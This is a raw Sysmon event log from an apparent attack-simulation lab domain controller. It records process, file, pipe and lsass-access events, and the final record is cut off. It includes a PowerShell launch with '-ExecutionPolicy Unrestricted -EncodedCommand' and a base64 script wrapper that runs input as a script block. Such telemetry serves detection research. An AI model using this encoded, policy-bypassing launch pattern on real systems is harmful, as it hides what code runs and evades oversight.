CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\ay2yhusm.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6439-6064-4FB3-100000000000}0x10b34f0HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x8000000000000000291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.700{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ay2yhusm.cmdline2021-03-31 11:59:57.700 11241100x8000000000000000290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 11:59:57.700{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ay2yhusm.dll2021-03-31 11:59:57.700 10341000x8000000000000000289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.262{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.262{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.262{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.950{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.950{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x8000000000000000414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 11:59:58.919{266CAFBE-643E-6064-D102-00000000AD01}1604\PSHost.132616655988627367.1604.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.919{266CAFBE-643E-6064-D102-00000000AD01}1604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_c5cvayfm.aj2.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.919{266CAFBE-643E-6064-D102-00000000AD01}1604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_v4hb2jul.yfn.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.903{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_v4hb2jul.yfn.ps12021-03-31 11:59:58.903 10341000x8000000000000000410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.856{266CAFBE-643E-6064-CE02-00000000AD01}21644624C:\Windows\system32\conhost.exe{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.856{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.856{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.856{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.856{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.856{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.856{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.856{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.856{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.856{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.856{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.856{266CAFBE-643E-6064-D002-00000000AD01}33204944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e7abfff3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f4347c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f430b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e7a0b3b5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f00029(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f63a9b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f45aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f45aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f4593b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f3665b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f43b9d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f4376a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f4347c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f430b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e7a0b3b5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f28362(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f278d4(wow64) 154100x8000000000000000397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.862{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 